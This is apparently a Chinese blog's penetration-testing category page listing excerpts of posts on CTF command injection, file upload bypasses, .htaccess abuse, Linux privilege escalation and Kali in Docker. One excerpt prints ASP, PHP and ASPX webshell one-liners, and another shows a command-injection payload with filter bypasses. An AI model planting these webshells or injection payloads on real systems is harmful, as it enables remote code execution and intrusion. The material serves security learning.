![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全渗透
文章平均质量分 52
欧阳大仙萌萌哒
这个作者很懒,什么都没留下…
展开
-
WgpSecCTF刷题
WgpSecCTF刷题小心我PING死你解题思路:PHP命令执行与绕过/?ip=127.0.0.1;ls通过GET方式提交常见Linux命令发现ls、cat、空格等均被过滤通过dir发现目录下存在flag.php与index.php利用less、more、tac等替代cat,查看index.php代码如下:?> } print_r($a); echo ""; $a = shell_exec("ping -c 4 ".$ip); } die("you cant ge原创 2022-01-06 12:02:55 · 1574 阅读 · 0 评论 -
【Shiro_exploit】PYTHON报错解决:ModuleNotFoundError: No module named 'requests'
在复现Apache Shiro 漏洞时,发现自己的python环境各种报错,值得注意的就是如下:Traceback (most recent call last): File "shiro_exploit.py", line 7, in <module> import requestsModuleNotFoundError: No module named 'requ...原创 2020-05-05 01:23:13 · 754 阅读 · 0 评论 -
第三周任务,利用文件上传漏洞
0x00 前言本周主要学习了文件上传各种姿势,掌握了常见的黑白名单后缀绕过、文件内容检查绕过的原理、实现及简单防护。0X01 文件上传校验姿势o 客户端javascript校验(一般只校验后缀名)o 服务端校验o 文件头content-type字段校验(image/gif)o 文件内容头校验(GIF89a)o 后缀名黑名单校验o 后缀名白名单校验o 自定义正则校验1.1 客户端...原创 2020-04-12 10:36:18 · 313 阅读 · 0 评论 -
文件上传漏洞之.htaccess
0x00 前言.htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htacce...原创 2020-03-12 21:00:46 · 5401 阅读 · 1 评论 -
一句话##错误 'ASP 0116' 丢失脚本关闭分隔符
可以突破Script 块缺少脚本关闭标记的一句话asp一句话<%execute(request(“NC”))%>"%><%execute(request(“NC”))%><%’php一句话<?php eval($_POST[NC]);?>aspx一句话<% @Page Language=“Jscript”%><%eva...原创 2020-03-07 18:25:59 · 570 阅读 · 0 评论 -
Linux提权获取敏感信息方法
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。...转载 2018-08-03 15:47:02 · 426 阅读 · 0 评论 -
信安入门神级书单
《社会工程:安全体系中的人性漏洞》 《Android应用安全防护和逆向分析》 《逆向工程核心原理》 《Metasploit渗透测试魔鬼训练营》 《鸟哥linux的私房菜》(第三版) 《Linux二进制分析》 《网络空间安全实战基础》 《Python绝技:运用Python成为顶级黑客》 《白帽子讲web安全》 《web前端黑客技术解密》...原创 2018-07-22 03:50:13 · 503 阅读 · 0 评论 -
docker下运行kalilinux并配置ssh访问
Kali Linux是一款开源的基于Debian的渗透测试专用操作系统,系统中包含一系列用于渗透测试的神器。 Docker是目前最火热的开源应用容器,发布于2014年6月。它能让开发者打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。Docker+KaliKali系统开发者Mati Aharoni认为:将Docker与Kali结合的...原创 2018-08-10 03:31:07 · 3904 阅读 · 1 评论